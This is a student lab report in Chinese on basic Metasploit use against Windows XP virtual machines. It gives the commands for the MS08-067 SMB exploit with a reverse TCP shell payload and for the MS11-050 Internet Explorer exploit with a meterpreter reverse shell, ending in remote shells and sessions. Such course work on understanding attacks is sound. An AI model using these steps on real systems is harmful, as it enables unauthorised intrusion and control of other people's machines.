20155305《網絡對抗》MSF基礎應用
阿新 • • 發佈:2018-04-15
pre iso鏡像 指令 選項 命令 進行 search 信息 中文簡體
20155305《網絡對抗》MSF基礎應用
實驗過程
實驗系統
- 靶機1:Windows XP Professional SP2 ,IP地址:192.168.1.108
- 靶機2:Windows XP Professional SP3 簡體中文,IP地址:192.168.1.113
- windows XP的虛擬機安裝可以在這個網址下載iso鏡像,至於序列號就百度吧,會有很多。
- Kali IP地址:192.168.1.105
1、主動攻擊:ms08_067
- 使用靶機1和Kali
先msfconsole
進入msf,再用search ms08_067
查詢一下針對該漏洞的攻擊模塊:
- 用
use exploit/windows/smb/ms08_067_netapi
- 用
show targets
查看可以被攻擊的靶機的操作系統型號:
- 用
show payloads
查看可以供我們使用的攻擊載荷:
- 從中找到一個可用的攻擊載荷
generic/shell_reverse_tcp
,用set payload generic/shell_reverse_tcp
設置payload:
- 用
show options
查看需要設置的參數:
- 這裏需要設置RHOST(靶機IP)和LHOST(Kali的IP),使用
set 需設置的參數名 參數值
命令即可設置:
- 設置target選項目標(例如我攻擊系統為WIN xp 中文簡體 SP2,所以選擇10)
- 用
show options
確認需要設置的參數是否已經設置好:
- 確認參數設置無誤後,用
exploit
指令開始攻擊:
- 攻擊成功後會獲取靶機的shell,可以對其進行操作:
2、針對瀏覽器的攻擊:ms11_050
- 使用靶機2和Kali(一開始用自己的最後會有問題,所以換了老師之前的kali)
用search ms11_050
查詢一下針對該漏洞的攻擊模塊,並用use windows/browser/ms11_050_mshtml_cobjectelement
使用該模塊:
- 用
info
查看該模塊的信息(這個指令相當於show targets
、show options
等的集合版):
基本信息:
- targets信息:
- options信息:
- 用
set payload windows/meterpreter/reverse_tcp
設置payload,並設置需要設置的參數。
用show options
確認需要設置的參數是否已經設置好:
- 確認參數設置無誤後,用exploit指令開始攻擊,攻擊成功後會有靶機需要訪問的網址:
- 在靶機IE上輸入該網址:
- kali中顯示session 1已經創建,並顯示其會話ID:
20155305《網絡對抗》MSF基礎應用